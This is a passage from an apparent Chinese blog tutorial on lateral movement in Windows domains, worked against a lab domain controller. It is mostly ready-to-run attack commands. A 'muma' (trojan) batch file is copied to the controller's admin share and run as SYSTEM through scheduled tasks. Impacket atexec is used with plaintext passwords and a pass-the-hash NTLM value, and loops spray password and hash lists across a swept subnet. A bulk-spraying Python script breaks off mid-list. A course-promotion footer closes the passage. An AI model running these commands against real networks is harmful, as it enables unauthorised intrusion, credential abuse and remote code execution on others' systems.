(6)1326:账号密码错误
(7)1792:目标 NetLogon 服务未启动,连接域控常常会出现此情况
(8)2242:用户密码过期,目标有账号策略,强制定期更改密码
2、拷贝要执行的命令脚本到域控
dir \\192.168.139.128\C$\ #查看域控c盘目录
copy C:\muma.bat \\192.168.139.128\C$ #复制文件到域控
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ChIfmCru-1666782771967)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220402183539779.png)]
3、查看目标时间,定时任务(at&schtasks)
net time /domain #查看域控时间
at \\192.168.139.128 18:40 C:\muma.bat #系统小于windows2012
schtasks /create /s 192.168.139.128 /ru "SYSTEM" /tn adduser /sc DAILY /tr C:\muma.bat /F #系统大于等于windows2012 创建adduser对应执行文件
schtasks /run /s 192.168.139.128 /tn adduser /i #运行adduser任务
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-nwqcQgnw-1666782771968)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220402185723553.png)]
4、删除计划任务
schtasks /delete /s 192.168.139.128 /tn adduser /f #删除adduser任务
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yv1r6juD-1666782771968)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220402190014138.png)]
三、域横向渗透明文HASH传递atexec-impacket
1、使用atexec明文
先删除之前的ipc连接
net use \\192.168.139.128 /del
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VwEKjir6-1666782771969)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220402190831235.png)]
使用atexec传递明文
atexec.exe 目标用户名:密码@目标ip "执行的命令”
atexec.exe administrator:admin.root.123@192.168.139.128 "whoami" #工作组
atexec.exe GHY/administrator:admin.root.123@192.168.139.128 "whoami" #域
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HJgewCN0-1666782771970)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220402191528572.png)]
自动提权到SYSTEM
2、使用atexec 进行传递HASH
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VvIsd35o-1666782771971)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220406092225030.png)]
NTLM:09731bc87db0aeb71e040f42978b3de1
atexec.exe -hashes :09731bc87db0aeb71e040f42978b3de1 ./administrator@192.168.139.128 "whoami"
atexec.exe -hashes :09731bc87db0aeb71e040f42978b3de1 GHY/administrator@192.168.139.128 "whoami"
#空格不能少!!!!
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-KrYhU83l-1666782771971)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220406092034994.png)]
四、批量利用
批量获取域内存活ip
for /L %i in (1,1,254) do @ping -w 1 -n 1 192.168.139.%i | findstr "TTL="
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-2wcp21P1-1666782771972)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220402200639098.png)]
批量检测ipc
for /F %i in (ips.txt) do net use \\%i\ipc$ "admin.root.123" /user:administrator #批量检测ip对应的明文连接(工作组)
for /F %i in (ips.txt) do net use \\%i\ipc$ "admin.root.123" /user:GHY\administrator
#批量检测ip对应的明文连接(域)
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-arlzJD8t-1666782771972)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220402202637032.png)]
for /F %i in (ips.txt) do atexec.exe ./administrator:admin.root.123@%i "whoami" #批量检测ip对应明文回显版(工作组)
for /F %i in (ips.txt) do atexec.exe GHY/administrator:admin.root.123@%i "whoami"
#批量检测ip对应的明文回显版(域)
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EtgOGbrV-1666782771973)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220405185658067.png)]
for /F %i in (pass.txt) do atexec.exe ./administrator:%i@192.168.139.128 "whoami"
#批量检测明文对应ip回显版(工作组)
for /F %u in (pass.txt) do atexec.exe GHY/administrator:%i@192.168.139.128 "whoami"
#批量检测明文对应ip回显版(域)
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PoFtfCqD-1666782771973)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220405190612253.png)]
for /F %i in (hash.txt) do atexec.exe -hashes :%i ./administrator@192.168.139.128 "whoami"
#批量检测hash对应ip回显版(工作组)
for /F %i in (hash.txt) do atexec.exe -hashes :%i GHY/administrator@192.168.139.128 "whoami"
#批量检测hash对应的ip回显版(域)
五、整体批量化
#net user \\192.168.139.128\ipc$ "admin.root.123" /user:GHY\administrator
#pip install pyinstaller
#pyinstaller -F ipc.py
import os,time
ipc={
'192.168.139.1',
'192.168.139.2',
'192.168.139.128',
'192.168.139.131',
'192.168.139.133'
}
passw={
'ghy00925',
'ghy.root',
'ghy.root.234',
## 学习路线:
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:
![在这里插入图片描述](https://img-blog.csdnimg.cn/7a04c5d629f1415a9e35662316578e07.png#pic_center)
**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**
**[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/topics/618540462)**
**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**